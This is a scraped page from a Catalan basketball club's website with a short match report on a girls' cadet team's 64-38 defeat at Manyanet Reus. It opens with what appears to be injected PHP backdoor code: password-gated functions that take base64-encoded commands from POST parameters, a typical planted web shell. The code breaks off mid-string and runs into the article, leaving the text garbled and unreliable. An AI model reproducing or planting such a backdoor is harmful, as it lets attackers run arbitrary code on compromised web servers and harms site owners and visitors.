function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 05 B perd massa pilotes i cau derrotat a la pista del Manyanet de Reus (64-38) - Tgn Bàsquet Club -

El cadet femení 05 B perd massa pilotes i cau derrotat a la pista del Manyanet de Reus (64-38)

Updated: novembre 26, 2019

L’equip cadet femení 05 B va perdre clarament contra el Manyanet Reus en un partit dominat clarament per les locals des de l’inici. Així, la superioritat reusenca sota la cistella va provocar constants contraatacs i el parcial del primer quart va ser de 26-12. Les liles van perdre 21 pilotes en la primera meitat i això va deixar un marcador al descans de 37-20, un fet que allunyava el triomf de les mans del TGN Bàsquet. Les visitants van millorar en la segona meitat però va ser insuficient per aspirar a la victòria.